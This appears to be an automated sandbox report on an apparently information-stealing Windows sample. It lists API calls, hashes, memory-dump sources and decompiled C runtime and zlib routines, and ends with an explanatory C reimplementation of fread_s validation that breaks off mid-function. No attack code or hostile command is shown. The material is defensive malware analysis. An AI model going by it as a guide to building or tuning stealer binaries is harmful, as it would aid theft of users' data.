                                                                                                                                                                                                                                    0x004172a4
                                                                                                                                                                                                                                    0x004172a9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00417267
                                                                                                                                                                                                                                    0x00417222
                                                                                                                                                                                                                                    0x00417223
                                                                                                                                                                                                                                    0x00417225
                                                                                                                                                                                                                                    0x00417228
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0041722a
                                                                                                                                                                                                                                    0x0041722a
                                                                                                                                                                                                                                    0x0041722e
                                                                                                                                                                                                                                    0x00417233
                                                                                                                                                                                                                                    0x0041724c
                                                                                                                                                                                                                                    0x00417252
                                                                                                                                                                                                                                    0x00417254
                                                                                                                                                                                                                                    0x00417256
                                                                                                                                                                                                                                    0x0041725c
                                                                                                                                                                                                                                    0x0041725c
                                                                                                                                                                                                                                    0x0041725c
                                                                                                                                                                                                                                    0x0041725f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0041725f
                                                                                                                                                                                                                                    0x00417235
                                                                                                                                                                                                                                    0x0041723a
                                                                                                                                                                                                                                    0x0041723c
                                                                                                                                                                                                                                    0x0041723e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00417240
                                                                                                                                                                                                                                    0x00417246
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00417246
                                                                                                                                                                                                                                    0x004171f4
                                                                                                                                                                                                                                    0x00417213
                                                                                                                                                                                                                                    0x00417213
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004171f4
                                                                                                                                                                                                                                    0x00417163
                                                                                                                                                                                                                                    0x00417164
                                                                                                                                                                                                                                    0x00417169
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0041716b
                                                                                                                                                                                                                                    0x0041716b
                                                                                                                                                                                                                                    0x00417174
                                                                                                                                                                                                                                    0x0041718a
                                                                                                                                                                                                                                    0x00417190
                                                                                                                                                                                                                                    0x00417192
                                                                                                                                                                                                                                    0x0041719d
                                                                                                                                                                                                                                    0x0041719d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0041719d
                                                                                                                                                                                                                                    0x00417194
                                                                                                                                                                                                                                    0x0041719a
                                                                                                                                                                                                                                    0x0041719a

APIs
• LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
• GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,047418B0), ref: 004170C5
• MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
• _malloc.LIBCMT ref: 0041718A
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
• LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
• LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
• _malloc.LIBCMT ref: 0041724C
• LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
• __freea.LIBCMT ref: 004172A4
• __freea.LIBCMT ref: 004172AD
• ___ansicp.LIBCMT ref: 004172DE
• ___convertcp.LIBCMT ref: 00417309
• LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
• _malloc.LIBCMT ref: 00417362
• _memset.LIBCMT ref: 00417384
• LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
• ___convertcp.LIBCMT ref: 004173BA
• __freea.LIBCMT ref: 004173CF
• LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
Memory Dump Source
• Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_con1332.jbxd
Yara matches
Similarity
• API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
• String ID:
• API String ID: 3809854901-0
• Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
• Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
• Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
• Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
Uniqueness

Uniqueness Score: -1.00%

APIs
• LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 02C0731A
• GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00423620), ref: 02C0732C
• _malloc.LIBCMT ref: 02C073F1
• _malloc.LIBCMT ref: 02C074B3
• LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 02C074DE
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 02C07501
• __freea.LIBCMT ref: 02C0750B
• __freea.LIBCMT ref: 02C07514
• ___ansicp.LIBCMT ref: 02C07545
• ___convertcp.LIBCMT ref: 02C07570
• _malloc.LIBCMT ref: 02C075C9
• _memset.LIBCMT ref: 02C075EB
• ___convertcp.LIBCMT ref: 02C07621
• __freea.LIBCMT ref: 02C07636
• LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 02C07650
Memory Dump Source
• Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
Yara matches
Similarity
• API ID: String__freea_malloc$___convertcp$ByteCharErrorLastMultiWide___ansicp_memset
• String ID:
• API String ID: 2918745354-0
• Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
• Instruction ID: 9b96aac64b677de533b8924222a0504709a78467900fb45aed907d283ac1c896
• Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
• Instruction Fuzzy Hash: B2B1C472800119EFDF199FA4CCC08EEBFB5EB88354F148469FA15A6190D730EA58DF90
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,00421320,0000000C,02C00977,00000000,00000000,?,00000001,02BFC22D,02BFB993), ref: 02C0084E
• __crt_waiting_on_module_handle.LIBCMT ref: 02C00859
  • Part of subcall function 02BFE9D1: Sleep.KERNEL32(000003E8,00000000,?,02C0079F,KERNEL32.DLL,?,02C007EB,?,00000001,02BFC22D,02BFB993), ref: 02BFE9DD
  • Part of subcall function 02BFE9D1: GetModuleHandleW.KERNEL32(00000001,?,02C0079F,KERNEL32.DLL,?,02C007EB,?,00000001,02BFC22D,02BFB993), ref: 02BFE9E6
• __lock.LIBCMT ref: 02C008B4
• InterlockedIncrement.KERNEL32(?), ref: 02C008C1
• __lock.LIBCMT ref: 02C008D5
• ___addlocaleref.LIBCMT ref: 02C008F3
Strings
Memory Dump Source
• Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
Yara matches
Similarity
• API ID: HandleModule__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
• String ID: @.B$KERNEL32.DLL
• API String ID: 4021795732-2520587274
• Opcode ID: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
• Instruction ID: ca0bb858f56b25e47c4919c3899d5c59da6c0f8b753f667fb72eaab3c7a71632
• Opcode Fuzzy Hash: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
• Instruction Fuzzy Hash: 8D11D271900701EED720AF35D84079ABBE0AF04310F10856ED9A9932E1CB749645CF98
Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                                                                                    			E004057B0(intOrPtr* __eax) {
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                                                    				intOrPtr* _t57;
                                                                                                                                                                                                                                    				char* _t60;
                                                                                                                                                                                                                                    				char _t62;
                                                                                                                                                                                                                                    				intOrPtr _t63;
                                                                                                                                                                                                                                    				char _t64;
                                                                                                                                                                                                                                    				intOrPtr _t65;
                                                                                                                                                                                                                                    				intOrPtr _t66;
                                                                                                                                                                                                                                    				intOrPtr _t67;
                                                                                                                                                                                                                                    				intOrPtr _t69;
                                                                                                                                                                                                                                    				intOrPtr _t70;
                                                                                                                                                                                                                                    				intOrPtr _t74;
                                                                                                                                                                                                                                    				intOrPtr _t79;
                                                                                                                                                                                                                                    				intOrPtr _t82;
                                                                                                                                                                                                                                    				intOrPtr* _t83;
                                                                                                                                                                                                                                    				void* _t86;
                                                                                                                                                                                                                                    				char* _t88;
                                                                                                                                                                                                                                    				char* _t89;
                                                                                                                                                                                                                                    				intOrPtr* _t91;
                                                                                                                                                                                                                                    				intOrPtr* _t93;
                                                                                                                                                                                                                                    				signed int _t97;
                                                                                                                                                                                                                                    				signed int _t98;
                                                                                                                                                                                                                                    				void* _t100;
                                                                                                                                                                                                                                    				void* _t101;
                                                                                                                                                                                                                                    				void* _t102;
                                                                                                                                                                                                                                    				void* _t103;
                                                                                                                                                                                                                                    				void* _t104;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t98 = _t97 | 0xffffffff;
                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t100 + 0xc)) = 0;
                                                                                                                                                                                                                                    				_t91 = __eax;
                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
                                                                                                                                                                                                                                    				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
                                                                                                                                                                                                                                    					__eflags = 0;
                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t93 = E0040B84D(0, _t86, __eax, 0x74);
                                                                                                                                                                                                                                    					_t101 = _t100 + 4;
                                                                                                                                                                                                                                    					if(_t93 == 0) {
                                                                                                                                                                                                                                    						L31:
                                                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x20)) = 0;
                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x24)) = 0;
                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x28)) = 0;
                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x44)) = 0;
                                                                                                                                                                                                                                    						 *_t93 = 0;
                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x48)) = 0;
                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0xc)) = 0;
                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x10)) = 0;
                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 4)) = 0;
                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x40)) = 0;
                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x38)) = 0;
                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x64)) = 0;
                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x68)) = 0;
                                                                                                                                                                                                                                    						 *(_t93 + 0x6c) = _t98;
                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
                                                                                                                                                                                                                                    						_t57 =  *((intOrPtr*)(_t101 + 0x78));
                                                                                                                                                                                                                                    						_t102 = _t101 + 0xc;
                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x50)) = 0;
                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x58)) = 0;
                                                                                                                                                                                                                                    						_t87 = _t57 + 1;
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_t82 =  *_t57;
                                                                                                                                                                                                                                    							_t57 = _t57 + 1;
                                                                                                                                                                                                                                    						} while (_t82 != 0);
                                                                                                                                                                                                                                    						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
                                                                                                                                                                                                                                    						_t103 = _t102 + 4;
                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
                                                                                                                                                                                                                                    						if(_t60 == 0) {
                                                                                                                                                                                                                                    							L30:
                                                                                                                                                                                                                                    							E00405160(0, _t87, _t93);
                                                                                                                                                                                                                                    							goto L31;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
                                                                                                                                                                                                                                    							_t88 = _t60;
                                                                                                                                                                                                                                    							goto L7;
                                                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                                                    							if( *_t91 == 0x72) {
                                                                                                                                                                                                                                    								 *((char*)(_t93 + 0x5c)) = 0x72;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t63 =  *_t91;
                                                                                                                                                                                                                                    							if(_t63 == 0x77 || _t63 == 0x61) {
                                                                                                                                                                                                                                    								 *((char*)(_t93 + 0x5c)) = 0x77;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t64 =  *_t91;
                                                                                                                                                                                                                                    							if(_t64 < 0x30 || _t64 > 0x39) {
                                                                                                                                                                                                                                    								__eflags = _t64 - 0x66;
                                                                                                                                                                                                                                    								if(_t64 != 0x66) {
                                                                                                                                                                                                                                    									__eflags = _t64 - 0x68;
                                                                                                                                                                                                                                    									if(_t64 != 0x68) {
                                                                                                                                                                                                                                    										__eflags = _t64 - 0x52;
                                                                                                                                                                                                                                    										if(_t64 != 0x52) {
                                                                                                                                                                                                                                    											_t89 =  *((intOrPtr*)(_t103 + 0x14));
                                                                                                                                                                                                                                    											 *_t89 = _t64;
                                                                                                                                                                                                                                    											_t87 = _t89 + 1;
                                                                                                                                                                                                                                    											__eflags = _t87;
                                                                                                                                                                                                                                    											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                    											 *((intOrPtr*)(_t103 + 0x10)) = 3;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										 *((intOrPtr*)(_t103 + 0x10)) = 2;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									 *((intOrPtr*)(_t103 + 0x10)) = 1;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t98 = _t64 - 0x30;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t91 = _t91 + 1;
                                                                                                                                                                                                                                    							if(_t64 == 0) {
                                                                                                                                                                                                                                    								goto L26;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t87 = _t103 + 0x68;
                                                                                                                                                                                                                                    							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
                                                                                                                                                                                                                                    								goto L9;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							L26:
                                                                                                                                                                                                                                    							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
                                                                                                                                                                                                                                    							if(_t65 == 0) {
                                                                                                                                                                                                                                    								goto L30;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								if(_t65 != 0x77) {
                                                                                                                                                                                                                                    									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
                                                                                                                                                                                                                                    									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
                                                                                                                                                                                                                                    									 *_t93 = _t66;
                                                                                                                                                                                                                                    									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
                                                                                                                                                                                                                                    									_t104 = _t103 + 0x14;
                                                                                                                                                                                                                                    									__eflags = _t67;
                                                                                                                                                                                                                                    									if(_t67 != 0) {
                                                                                                                                                                                                                                    										goto L30;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										__eflags =  *((intOrPtr*)(_t93 + 0x44));
                                                                                                                                                                                                                                    										if(__eflags == 0) {
                                                                                                                                                                                                                                    											goto L30;
                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                    											goto L34;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_push(0x38);
                                                                                                                                                                                                                                    									_push("1.2.3");
                                                                                                                                                                                                                                    									_push( *((intOrPtr*)(_t103 + 0x10)));
                                                                                                                                                                                                                                    									_push(8);
                                                                                                                                                                                                                                    									_push(0xfffffff1);
                                                                                                                                                                                                                                    									_push(8);
                                                                                                                                                                                                                                    									_push(_t98);
                                                                                                                                                                                                                                    									_push(_t93);
                                                                                                                                                                                                                                    									_t91 = E00404CE0();
                                                                                                                                                                                                                                    									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
                                                                                                                                                                                                                                    									_t104 = _t103 + 0x24;
                                                                                                                                                                                                                                    									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
                                                                                                                                                                                                                                    									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
                                                                                                                                                                                                                                    									if(_t91 != 0 || _t79 == 0) {
                                                                                                                                                                                                                                    										goto L30;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										L34:
                                                                                                                                                                                                                                    										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
                                                                                                                                                                                                                                    										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
                                                                                                                                                                                                                                    										_t69 =  *((intOrPtr*)(_t104 + 0x70));
                                                                                                                                                                                                                                    										__eflags = _t69;
                                                                                                                                                                                                                                    										_push(_t104 + 0x18);
                                                                                                                                                                                                                                    										if(__eflags >= 0) {
                                                                                                                                                                                                                                    											_push(_t69);
                                                                                                                                                                                                                                    											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                    											_t87 =  *((intOrPtr*)(_t104 + 0x70));
                                                                                                                                                                                                                                    											_push( *((intOrPtr*)(_t104 + 0x70)));
                                                                                                                                                                                                                                    											_t70 = E0040CB9D();
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
                                                                                                                                                                                                                                    										__eflags = _t70;
                                                                                                                                                                                                                                    										if(_t70 == 0) {
                                                                                                                                                                                                                                    											goto L30;
                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                    											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
                                                                                                                                                                                                                                    											if( *((char*)(_t93 + 0x5c)) != 0x77) {
                                                                                                                                                                                                                                    												E00405000(_t93, 0);
                                                                                                                                                                                                                                    												_push( *((intOrPtr*)(_t93 + 0x40)));
                                                                                                                                                                                                                                    												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
                                                                                                                                                                                                                                    												__eflags = _t74;
                                                                                                                                                                                                                                    												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
                                                                                                                                                                                                                                    												return _t93;
                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                    												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
                                                                                                                                                                                                                                    												return _t93;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							goto L42;
                                                                                                                                                                                                                                    							L7:
                                                                                                                                                                                                                                    							_t62 =  *_t83;
                                                                                                                                                                                                                                    							 *_t88 = _t62;
                                                                                                                                                                                                                                    							_t83 = _t83 + 1;
                                                                                                                                                                                                                                    							_t88 = _t88 + 1;
                                                                                                                                                                                                                                    							if(_t62 != 0) {
                                                                                                                                                                                                                                    								goto L7;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								 *((char*)(_t93 + 0x5c)) = 0;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							goto L9;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				L42:
                                                                                                                                                                                                                                    			}
                                                                                                                                                                                                                                    0x004057b7
                                                                                                                                                                                                                                    0x004057bf
                                                                                                                                                                                                                                    0x004057c3
                                                                                                                                                                                                                                    0x004057c5
                                                                                                                                                                                                                                    0x004057cd
                                                                                                                                                                                                                                    0x004059c8
                                                                                                                                                                                                                                    0x004059ce
                                                                                                                                                                                                                                    0x004057db
                                                                                                                                                                                                                                    0x004057e3
                                                                                                                                                                                                                                    0x004057e5
                                                                                                                                                                                                                                    0x004057ea
                                                                                                                                                                                                                                    0x00405921
                                                                                                                                                                                                                                    0x0040592a
                                                                                                                                                                                                                                    0x004057f0
                                                                                                                                                                                                                                    0x004057f3
                                                                                                                                                                                                                                    0x004057f6
                                                                                                                                                                                                                                    0x004057f9
                                                                                                                                                                                                                                    0x004057fc
                                                                                                                                                                                                                                    0x004057ff
                                                                                                                                                                                                                                    0x00405801
                                                                                                                                                                                                                                    0x00405804
                                                                                                                                                                                                                                    0x00405807
                                                                                                                                                                                                                                    0x0040580a
                                                                                                                                                                                                                                    0x0040580d
                                                                                                                                                                                                                                    0x00405810
                                                                                                                                                                                                                                    0x00405813
                                                                                                                                                                                                                                    0x00405868
                                                                                                                                                                                                                                    0x0040584f
                                                                                                                                                                                                                                    0x004057ea
                                                                                                                                                                                                                                    0x00000000

APIs
• _malloc.LIBCMT ref: 004057DE
  • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
  • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
  • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
• _malloc.LIBCMT ref: 00405842
• _malloc.LIBCMT ref: 00405906
• _malloc.LIBCMT ref: 00405930
Strings
Memory Dump Source
• Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_con1332.jbxd
Yara matches
Similarity
• API ID: _malloc$AllocateHeap
• String ID: 1.2.3
• API String ID: 680241177-2310465506
• Opcode ID: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
• Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
• Opcode Fuzzy Hash: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
• Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
Uniqueness
• Uniqueness Score: -1.00%

APIs
• _malloc.LIBCMT ref: 02BF5A45
  • Part of subcall function 02BFBAB4: __FF_MSGBANNER.LIBCMT ref: 02BFBAD7
  • Part of subcall function 02BFBAB4: __NMSG_WRITE.LIBCMT ref: 02BFBADE
• _malloc.LIBCMT ref: 02BF5AA9
• _malloc.LIBCMT ref: 02BF5B6D
• _malloc.LIBCMT ref: 02BF5B97
Strings
Memory Dump Source
• Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
Yara matches
Similarity
• API ID: _malloc
• String ID: 1.2.3
• API String ID: 1579825452-2310465506
• Opcode ID: 7bb03aca1fc5991893fbdddb05e44545bf6cb9a06a6e9765b2a21d01904c984c
• Instruction ID: 362951664eef0b364225e256b84f9e992b276ed21efbffbfb43feb1c2549494b
• Opcode Fuzzy Hash: 7bb03aca1fc5991893fbdddb05e44545bf6cb9a06a6e9765b2a21d01904c984c
• Instruction Fuzzy Hash: 7261CFB19487808FC7B09F29888066AFBE1FB45214F944DAED3DA83A01D775A44ECF52
Uniqueness
• Uniqueness Score: -1.00%

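The decompiled function E0040BCC2 that follows has the argument order, checks and constants of the statically linked MSVCRT `_fread_nolock_s(buffer, bufferSize, elementSize, count, stream)`: it is CRT library code carried along by the sample, not stealer logic. As an added example (not code from this report or from the sample), the validation prologue of that routine is written out below in plain C so the constants in the decompilation can be read off directly: the `0x10c` flag mask, the `0x1000` default buffer size, `_bufsiz` at FILE offset `0x18`, and the `0xffffffff` test (SIZE_MAX on the 32-bit sample). The FILE mirror, the result enum and the function names are assumptions for illustration. The point worth seeing is the order of operations: the product `elementSize * count` is only formed after a division-based check proves it cannot wrap, and the caller's buffer is zeroed before the call is rejected.

```c
/* Added example: a plain-C reimplementation of the parameter-validation
 * prologue seen in the decompiled E0040BCC2 (MSVCRT _fread_nolock_s layout).
 * Not code from the Joe Sandbox report or from the analysed sample. The FILE
 * mirror, the result enum and the function names are illustrative
 * assumptions; the constants come from the decompilation. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Flag bits of the 32-bit MSVCRT FILE::_flag; their OR is the 0x10c mask. */
#define MSVCRT_IOYOURBUF 0x0004   /* caller-supplied buffer */
#define MSVCRT_IOMYBUF   0x0008   /* buffer allocated by the CRT */
#define MSVCRT_IONBF     0x0100   /* unbuffered stream */
#define MSVCRT_ANYBUF    (MSVCRT_IOYOURBUF | MSVCRT_IOMYBUF | MSVCRT_IONBF)
#define MSVCRT_INTERNAL_BUFSIZ 0x1000   /* the 0x1000 fallback in the decompilation */

/* Mirror of the 32-bit MSVCRT _iobuf field order, so that _flag sits at
 * offset 0x0c and _bufsiz at 0x18, the two offsets the decompilation reads. */
typedef struct {
    char *_ptr;      /* 0x00 */
    int   _cnt;      /* 0x04 */
    char *_base;     /* 0x08 */
    int   _flag;     /* 0x0c */
    int   _file;     /* 0x10 */
    int   _charbuf;  /* 0x14 */
    int   _bufsiz;   /* 0x18 */
    char *_tmpfname; /* 0x1c */
} crt_file_t;

typedef enum {
    PROLOGUE_OK = 0,
    PROLOGUE_ZERO_REQUEST,     /* elementSize == 0 || count == 0: return 0, nothing read */
    PROLOGUE_EINVAL_BUFFER,    /* buffer == NULL */
    PROLOGUE_EINVAL_STREAM,    /* stream == NULL */
    PROLOGUE_EINVAL_OVERFLOW   /* elementSize * count would wrap */
} prologue_result_t;

/* Performs the checks the decompiled function runs before touching the
 * stream and reports which branch was taken. On PROLOGUE_OK, *total receives
 * elementSize * count (the decompilation's _v20) and *streambufsize the
 * stream buffer size it will work with (_v16). */
prologue_result_t fread_s_prologue(void *buffer, size_t bufferSize,
                                   size_t elementSize, size_t count,
                                   const crt_file_t *stream,
                                   size_t *total, size_t *streambufsize)
{
    if (elementSize == 0 || count == 0)
        return PROLOGUE_ZERO_REQUEST;
    if (buffer == NULL)
        return PROLOGUE_EINVAL_BUFFER;

    /* Division, not multiplication: count > SIZE_MAX / elementSize cannot
     * wrap, whereas inspecting elementSize * count after the fact could let a
     * wrapped, small product reach the copy loop. Before rejecting the call
     * the CRT zeroes the caller's buffer when its size is known (bufferSize
     * != SIZE_MAX), so a caller that ignores the return value never consumes
     * stale bytes as if they had been read. */
    if (stream == NULL || count > SIZE_MAX / elementSize) {
        if (bufferSize != SIZE_MAX)
            memset(buffer, 0, bufferSize);
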